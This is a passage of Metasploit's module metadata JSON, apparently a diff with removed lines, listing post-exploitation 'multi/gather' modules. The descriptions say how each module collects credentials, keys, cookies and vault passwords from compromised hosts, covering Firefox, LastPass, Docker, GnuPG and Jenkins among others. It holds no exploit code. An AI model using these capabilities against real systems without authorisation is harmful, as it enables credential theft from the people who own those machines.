the encrypted passwords.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dbvis_enum.rb", - "is_install_path": true, - "ref_name": "multi/gather/dbvis_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_bruteforce": { - "name": "Multi Gather DNS Forward Lookup Bruteforce", - "fullname": "post/multi/gather/dns_bruteforce", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Brute force subdomains and hostnames via wordlist.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_bruteforce.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_bruteforce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_reverse_lookup": { - "name": "Multi Gather DNS Reverse Lookup Scan", - "fullname": "post/multi/gather/dns_reverse_lookup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Performs DNS reverse lookup using the OS included DNS query command.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_reverse_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_srv_lookup": { - "name": "Multi Gather DNS Service Record Lookup Scan", - "fullname": "post/multi/gather/dns_srv_lookup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Enumerates known SRV Records for a given domain using target host DNS query tool.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_srv_lookup.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_srv_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/docker_creds": { - "name": "Multi Gather Docker Credentials Collection", - "fullname": "post/multi/gather/docker_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Flibustier" - ], - "description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. If the user has already push to docker hub, chances are that the password was\n saved in base64 (default behavior).", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/docker_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/docker_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/electerm": { - "name": "Gather electerm Passwords", - "fullname": "post/multi/gather/electerm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if electerm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible.", - "references": [ - "URL-https://blog.kali-team.cn/metasploit-electerm-6854f3d868eb45eab6951acc463a910d" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/electerm.rb", - "is_install_path": true, - "ref_name": "multi/gather/electerm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/enum_hexchat": { - "name": "Linux Gather HexChat/XChat Enumeration", - "fullname": "post/multi/gather/enum_hexchat", - "aliases": [ - "post/linux/gather/enum_xchat" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r ", - "h00die" - ], - "description": "This module will collect HexChat and XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.", - "references": [ - "URL-https://hexchat.readthedocs.io/en/latest/settings.html" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/enum_hexchat.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_hexchat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ALL", - "description": "Collect both the configs and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - }, - { - "name": "CONFIGS", - "description": "Collect config files" - } - ] - }, - "post_multi/gather/enum_software_versions": { - "name": "Multiplatform Installed Software Version Enumerator", - "fullname": "post/multi/gather/enum_software_versions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "gwillcox-r7" - ], - "description": "This module, when run against a compromised machine, will gather details on all installed software,\n including their versions and if available, when they were installed, and will save it into a loot file for later use.\n Users can then use this loot file to determine what additional vulnerabilites may affect the target machine.\n\n Note that for Linux systems, software enumeration is done via package managers. As a result the results may\n not reflect all of the available software on the system simply because users may have installed additional\n software from alternative sources such as source code that these package managers are not aware of.", - "references": [], - "platform": "Android,BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/enum_software_versions.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_software_versions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/enum_vbox": { - "name": "Multi Gather VirtualBox VM Enumeration", - "fullname": "post/multi/gather/enum_vbox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/enum_vbox.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_vbox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/env": { - "name": "Multi Gather Generic Operating System Environment Settings", - "fullname": "post/multi/gather/env", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "egypt " - ], - "description": "This module prints out the operating system environment variables.", - "references": [], - "platform": "Linux,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-01 13:37:15 +0000", - "path": "/modules/post/multi/gather/env.rb", - "is_install_path": true, - "ref_name": "multi/gather/env", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "powershell", - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/fetchmailrc_creds": { - "name": "UNIX Gather .fetchmailrc Credentials", - "fullname": "post/multi/gather/fetchmailrc_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/fetchmailrc_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/filezilla_client_cred": { - "name": "Multi Gather FileZilla FTP Client Credential Collection", - "fullname": "post/multi/gather/filezilla_client_cred", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "Carlos Perez " - ], - "description": "This module will collect credentials from the FileZilla FTP client if it is installed.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/filezilla_client_cred.rb", - "is_install_path": true, - "ref_name": "multi/gather/filezilla_client_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/find_vmx": { - "name": "Multi Gather VMWare VM Identification", - "fullname": "post/multi/gather/find_vmx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will attempt to find any VMWare virtual machines stored on the target.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/find_vmx.rb", - "is_install_path": true, - "ref_name": "multi/gather/find_vmx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/firefox_creds": { - "name": "Multi Gather Firefox Signon Credential Collection", - "fullname": "post/multi/gather/firefox_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "xard4s", - "g0tmi1k" - ], - "description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded. Which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non working state. If a\n Master Password was used the only option would be to bruteforce.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/firefox_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/firefox_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/gpg_creds": { - "name": "Multi Gather GnuPG Credentials Collection", - "fullname": "post/multi/gather/gpg_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Dhiru Kholia ", - "Henry Hoggard" - ], - "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/gpg_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/gpg_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/grub_creds": { - "name": "Gather GRUB Password", - "fullname": "post/multi/gather/grub_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Garvit Dewan ", - "Taeber Rapczak ", - "Shelby Pace" - ], - "description": "This module gathers GRUB passwords from GRUB bootloader config files.", - "references": [ - "URL-https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption" - ], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/grub_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/grub_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/irssi_creds": { - "name": "Multi Gather IRSSI IRC Password(s)", - "fullname": "post/multi/gather/irssi_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jonathan Claudius " - ], - "description": "This module grabs IRSSI IRC credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/irssi_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/irssi_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/jboss_gather": { - "name": "JBoss Credential Collector", - "fullname": "post/multi/gather/jboss_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/jboss_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/jboss_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/jenkins_gather": { - "name": "Jenkins Credential Collector", - "fullname": "post/multi/gather/jenkins_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "thesubtlety" - ], - "description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. Interesting files will be stored in\n loot along with combined csv output.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/jenkins_gather.rb", - "is_install_path": true, - "ref_name": "multi/gather/jenkins_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/lastpass_creds": { - "name": "LastPass Vault Decryptor", - "fullname": "post/multi/gather/lastpass_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Garcia Illera ", - "Martin Vigo ", - "Jon Hart " - ], - "description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords", - "references": [ - "URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/lastpass_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/lastpass_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/maven_creds": { - "name": "Multi Gather Maven Credentials Collection", - "fullname": "post/multi/gather/maven_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "elenoir" - ], - "description": "This module will collect the contents of all users settings.xml on the targeted\n machine.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/maven_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/maven_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/memory_search": { - "name": "Memory Search", - "fullname": "post/multi/gather/memory_search", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sjanusz-r7" - ], - "description": "This module allows for searching the memory space of running processes for\n potentially sensitive data such as passwords.", - "references": [], - "platform": "Linux,OSX,Unix,Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-24 19:55:53 +0000", - "path": "/modules/post/multi/gather/memory_search.rb", - "is_install_path": true, - "ref_name": "multi/gather/memory_search", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/minio_client": { - "name": "Gather MinIO Client Key", - "fullname": "post/multi/gather/minio_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module searches for MinIO Client credentials on a Windows host.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/minio_client.rb", - "is_install_path": true, - "ref_name": "multi/gather/minio_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/multi_command": { - "name": "Multi Gather Run Shell Command Resource File", - "fullname": "post/multi/gather/multi_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/multi_command.rb", - "is_install_path": true, - "ref_name": "multi/gather/multi_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/netrc_creds": { - "name": "UNIX Gather .netrc Credentials", - "fullname": "post/multi/gather/netrc_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for FTP and other services in .netrc", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/netrc_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/netrc_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/pgpass_creds": { - "name": "Multi Gather pgpass Credentials", - "fullname": "post/multi/gather/pgpass_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Zach Grace " - ], - "description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/pgpass_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/pgpass_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/pidgin_cred": { - "name": "Multi Gather Pidgin Instant Messenger Credential Collection", - "fullname": "post/multi/gather/pidgin_cred", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "Carlos Perez " - ], - "description": "This module will collect credentials from the Pidgin IM client if it is installed.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/pidgin_cred.rb", - "is_install_path": true, - "ref_name": "multi/gather/pidgin_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/ping_sweep": { - "name": "Multi Gather Ping Sweep", - "fullname": "post/multi/gather/ping_sweep", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Performs IPv4 ping sweep using the OS included ping command.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/ping_sweep.rb", - "is_install_path": true, - "ref_name": "multi/gather/ping_sweep", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/remmina_creds": { - "name": "UNIX Gather Remmina Credentials", - "fullname": "post/multi/gather/remmina_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/remmina_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/remmina_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/resolve_hosts": { - "name": "Multi Gather Resolve Hosts", - "fullname": "post/multi/gather/resolve_hosts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.", - "references": [], - "platform": "Python,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/resolve_hosts.rb", - "is_install_path": true, - "ref_name": "multi/gather/resolve_hosts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/rsyncd_creds": { - "name": "UNIX Gather RSYNC Credentials", - "fullname": "post/multi/gather/rsyncd_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for RSYNC in various locations", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/rsyncd_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/rsyncd_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/rubygems_api_key": { - "name": "Multi Gather RubyGems API Key", - "fullname": "post/multi/gather/rubygems_api_key", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jonathan Claudius ", - "Brandon Myers " - ], - "description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/rubygems_api_key.rb", - "is_install_path": true, - "ref_name": "multi/gather/rubygems_api_key", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/run_console_rc_file": { - "name": "Multi Gather Run Console Resource File", - "fullname": "post/multi/gather/run_console_rc_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/run_console_rc_file.rb", - "is_install_path": true, - "ref_name": "multi/gather/run_console_rc_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/saltstack_salt": { - 